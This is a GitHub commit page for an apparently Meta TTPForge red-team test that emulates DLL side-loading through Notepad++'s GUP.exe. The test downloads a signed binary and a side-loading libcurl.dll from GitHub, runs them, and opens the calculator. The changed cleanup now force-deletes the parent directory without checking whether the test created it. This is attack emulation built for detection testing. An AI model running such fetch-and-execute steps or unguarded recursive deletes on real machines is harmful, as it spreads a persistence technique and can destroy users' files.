Skip to content

Commit

Permalink
Update Windows Atomic Tests to TTP #2 (#139)
Browse files Browse the repository at this point in the history
Summary:
Pull Request resolved: #139

Converting atomics to ttps in Windows Atomic Red Team Tests
This ttp was 2/10 and it performs the follow function:
DLL Side-Loading using the Notepad++ GUP.exe binary

Reviewed By: godlovepenn

Differential Revision: D62892914
  • Loading branch information
jazzyle authored and facebook-github-bot committed Sep 18, 2024
1 parent 8e78c21 commit 27175c8
Show file tree
Hide file tree
Showing 2 changed files with 67 additions and 21 deletions.
7 changes: 4 additions & 3 deletions ttps/persistence/windows/dll-side-loading/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -8,11 +8,12 @@ Derived from [Atomic Red Team T1574.002](https://github.com/redcanaryco/atomic-r

## Arguments
- **process_name**: a string flag specifying the name of created calc process. Default is "CalculatorApp".
- **gup_exe**: a path flag specifying location of GUP.exe. Default is "bin\GUP.exe".
- **curl_dll**: a path flag specifying location of libcurl.dll. Default is "bin\libcurl.dll".
- **gup_exe**: a string flag specifying location of GUP.exe. Default is "$PWD\bin\GUP.exe".
- **curl_dll**: a string flag specifying location of libcurl.dll. Default is "$PWD\bin\libcurl.dll".

## Pre-requisites
- Windows operating system equipped with powershell
- libcurl.dll and GUP.exe must be in the same directory

## Examples
You can run the TTP using the following example (after updating the arguments):
Expand All @@ -23,7 +24,7 @@ ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.
ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg process_name=calc
```
```bash
ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg gup_exe=bin\myGUP.exe --arg curl_dll=bin\mylibcurl.dll
ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg gup_exe=test\myGUP.exe --arg curl_dll=test\mylibcurl.dll
```

## Steps
Expand Down
81 changes: 63 additions & 18 deletions ttps/persistence/windows/dll-side-loading/dll-side-loading.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -3,8 +3,8 @@ api_version: 2.0
uuid: a0dbea02-4978-4318-9af7-1aef1e2d2409
name: DLL Side-Loading using the Notepad++ GUP.exe binary
description: |
GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
Upon execution, calc.exe will be opened.
GUP is an open source signed binary used by Notepad++ for software updates, and it is vulnerable to DLL Side-Loading.
This enables the libcurl dll to be loaded and upon execution, calc.exe will be opened.
Derived from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary
requirements:
platforms:
Expand All @@ -23,40 +23,85 @@ args:
default: CalculatorApp
- name: gup_exe
description: GUP is an open source signed binary used by Notepad++ for software updates
type: path
default: bin\GUP.exe
type: string
default: $PWD\bin\GUP.exe
- name: curl_dll
description: GUP requires libcurl.dll to function
type: path
default: bin\libcurl.dll
type: string
default: $PWD\bin\libcurl.dll

steps:
- name: execute_GUP
executor: powershell
description: |
GUP.exe binary must exist on disk at specified location ({{.Args.gup_exe}}).
Downloads GUP.exe, if not provided, and executes binary.
inline: |
$parent = Split-Path "{{.Args.gup_exe}}" -Parent
Write-Host "GUP.exe binary must exist on disk at specified location ({{.Args.gup_exe}})."
$parentExe = Split-Path "{{.Args.gup_exe}}" -Parent
$parentDll = Split-Path "{{.Args.curl_dll}}" -Parent
if ($parentExe -cne $parentDll){
Write-Host "Error: GUP.exe and libcurl.dll must be in the same directory."
Write-Host "GUP.exe at: {{.Args.gup_exe}}"
Write-Host "libcurl.dll at: {{.Args.curl_dll}}"
exit 1
}
if (-Not (Test-Path "{{.Args.gup_exe}}")) {
New-Item -Type Directory -Path ${parent} -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "{{.Args.gup_exe}}"
New-Item -ItemType File -Path "${parent}\.downloaded" -ErrorAction ignore | Out-Null
Write-Host "GUP.exe not found. Downloading..."
New-Item -Type Directory -Path ${parentExe} -ErrorAction Ignore | Out-Null
try {
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "{{.Args.gup_exe}}"
} catch {
Write-Host "Failed to download GUP.exe : $_"
exit 1
}
Write-Host "GUP.exe downloaded to: {{.Args.gup_exe}}"
} else {
Write-Host "GUP.exe already exists at: {{.Args.gup_exe}}"
}
if (-Not (Test-Path "{{.Args.curl_dll}}")) {
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/libcurl.dll?raw=true" -OutFile "${parent}\libcurl.dll"
New-Item -ItemType File -Path "${parent}\.downloaded" -ErrorAction ignore | Out-Null
Write-Host "libcurl.dll not found. Downloading..."
New-Item -Type Directory -Path ${parentDll} -ErrorAction Ignore | Out-Null
try {
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/libcurl.dll?raw=true" -OutFile "{{.Args.curl_dll}}"
} catch {
Write-Host "Failed to download libcurl.dll : $_"
exit 1
}
Write-Host "libcurl.dll downloaded to: {{.Args.curl_dll}}"
} else {
Copy-Item -Path "{{.Args.curl_dll}}" -Destination "${parent}\libcurl.dll"
Write-Host "libcurl.dll already exists at: {{.Args.curl_dll}}"
}
&"{{.Args.gup_exe}}"
Write-Host "Executing GUP.exe to test sideloading ....."
&{{.Args.gup_exe}}
cleanup:
executor: powershell
inline: |
stop-process -name {{.Args.process_name}}
try {
Write-Host "Attempting to stop {{.Args.process_name}} process..."
Stop-Process -Name "{{.Args.process_name}}" -ErrorAction Stop
Write-Host "Successfully stopped {{.Args.process_name}}"
} catch {
Write-Host "Failed to stop {{.Args.process_name}}: $_"
}
$parent = Split-Path "{{.Args.gup_exe}}" -Parent
if (Test-Path "${parent}\.downloaded"){
remove-item -r $parent
Write-Host "Parent directory to clean up: $parent"
if (Test-Path $parent) {
Write-Host "Attempting to remove directory: $parent"
Remove-Item -Path $parent -Recurse -Force -ErrorAction SilentlyContinue
if ($?) {
Write-Host "Successfully removed $parent"
} else {
Write-Host "Failed to remove $parent"
}
} else {
Write-Host "Directory $parent does not exist. No cleanup needed."
}

0 comments on commit 27175c8

Please sign in to comment.